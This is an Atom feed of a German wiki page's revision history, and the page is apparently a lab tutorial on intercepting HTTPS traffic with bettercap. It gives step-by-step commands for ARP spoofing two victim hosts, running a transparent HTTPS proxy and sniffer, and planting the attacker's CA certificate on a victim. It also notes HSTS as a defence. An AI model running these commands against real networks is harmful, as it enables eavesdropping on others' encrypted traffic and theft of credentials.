<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="de">
	<id>https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=HTTPS_MITM_mit_bettercap</id>
	<title>HTTPS MITM mit bettercap - Versionsgeschichte</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.ixheim.de/index.php?action=history&amp;feed=atom&amp;title=HTTPS_MITM_mit_bettercap"/>
	<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=HTTPS_MITM_mit_bettercap&amp;action=history"/>
	<updated>2026-06-28T19:33:12Z</updated>
	<subtitle>Versionsgeschichte dieser Seite in Xinux Wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://wiki.ixheim.de/index.php?title=HTTPS_MITM_mit_bettercap&amp;diff=69931&amp;oldid=prev</id>
		<title>Thomas.will: Die Seite wurde neu angelegt: „= HTTPS MITM mit bettercap = Eine HTTPS MITM Attacke erlaubt es den verschlüsselten HTTPS-Traffic zwischen Opfer und Server mitzulesen. bettercap kombiniert d…“</title>
		<link rel="alternate" type="text/html" href="https://wiki.ixheim.de/index.php?title=HTTPS_MITM_mit_bettercap&amp;diff=69931&amp;oldid=prev"/>
		<updated>2026-05-11T15:19:38Z</updated>

		<summary type="html">&lt;p&gt;Die Seite wurde neu angelegt: „= HTTPS MITM mit bettercap = Eine HTTPS MITM Attacke erlaubt es den verschlüsselten HTTPS-Traffic zwischen Opfer und Server mitzulesen. bettercap kombiniert d…“&lt;/p&gt;
&lt;p&gt;&lt;b&gt;Neue Seite&lt;/b&gt;&lt;/p&gt;&lt;div&gt;= HTTPS MITM mit bettercap =&lt;br /&gt;
Eine HTTPS MITM Attacke erlaubt es den verschlüsselten HTTPS-Traffic zwischen Opfer und Server mitzulesen. bettercap kombiniert dazu ARP Spoofing mit einem transparenten HTTPS Proxy.&lt;br /&gt;
&lt;br /&gt;
== Umgebung ==&lt;br /&gt;
 KALI    = 192.168.16.101  (Angreifer)&lt;br /&gt;
 ALICE   = 192.168.16.131  (Opfer 1)&lt;br /&gt;
 BOB     = 192.168.16.132  (Opfer 2)&lt;br /&gt;
&lt;br /&gt;
== Voraussetzung ==&lt;br /&gt;
;IP-Forwarding auf Kali aktivieren&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
&lt;br /&gt;
== Angreifer - bettercap starten ==&lt;br /&gt;
 sudo bettercap -iface eth0&lt;br /&gt;
&lt;br /&gt;
== In der bettercap-Konsole ==&lt;br /&gt;
;ARP MITM + HTTPS Proxy kombiniert&lt;br /&gt;
 set arp.spoof.targets 192.168.16.131,192.168.16.132&lt;br /&gt;
 set arp.spoof.internal true&lt;br /&gt;
 set arp.spoof.fullduplex true&lt;br /&gt;
 arp.spoof on&lt;br /&gt;
 https.proxy on&lt;br /&gt;
 net.sniff on&lt;br /&gt;
&lt;br /&gt;
== Optionen https.proxy ==&lt;br /&gt;
;Hilfe anzeigen&lt;br /&gt;
 help https.proxy&lt;br /&gt;
* https.proxy.address       → Bind-Adresse des Proxy (default=0.0.0.0)&lt;br /&gt;
* https.proxy.port          → Port des Proxy (default=8083)&lt;br /&gt;
* https.proxy.certificate   → Pfad zum CA-Zertifikat&lt;br /&gt;
* https.proxy.key           → Pfad zum CA-Key&lt;br /&gt;
* https.proxy.script        → Javascript für Manipulation der Requests&lt;br /&gt;
&lt;br /&gt;
== Zertifikat ==&lt;br /&gt;
;bettercap generiert automatisch ein selbstsigniertes CA-Zertifikat&lt;br /&gt;
;Der Browser des Opfers zeigt eine Zertifikatswarnung&lt;br /&gt;
;Zertifikat liegt unter&lt;br /&gt;
 ~/.bettercap-ca.cert.pem&lt;br /&gt;
;Auf dem Opfer installieren um Warnung zu unterdrücken (Labor)&lt;br /&gt;
 sudo cp ~/.bettercap-ca.cert.pem /usr/local/share/ca-certificates/bettercap.crt&lt;br /&gt;
 sudo update-ca-certificates&lt;br /&gt;
&lt;br /&gt;
== Test auf Alice ==&lt;br /&gt;
;HTTPS-Seite aufrufen&lt;br /&gt;
 curl -k https://xinux.de&lt;br /&gt;
;Auf Kali sollte der Traffic im net.sniff sichtbar sein&lt;br /&gt;
&lt;br /&gt;
== Hinweis ==&lt;br /&gt;
* Moderne Browser mit '''HSTS''' (HTTP Strict Transport Security) blockieren diesen Angriff&lt;br /&gt;
* '''HSTS Preload''' Domains (google.com, facebook.com etc.) sind nicht angreifbar&lt;br /&gt;
* Funktioniert gut gegen interne Webserver ohne HSTS&lt;br /&gt;
&lt;br /&gt;
== Mögliche Folgeangriffe ==&lt;br /&gt;
* [[Web Spoofing mit bettercap]]&lt;br /&gt;
* [[DNS Spoofing mit bettercap]]&lt;br /&gt;
* [[mitmproxy]]&lt;br /&gt;
&lt;br /&gt;
== Siehe auch ==&lt;br /&gt;
* [[ARP Spoofing mit bettercap]]&lt;br /&gt;
* [[bettercap]]&lt;/div&gt;</summary>
		<author><name>Thomas.will</name></author>
	</entry>
</feed>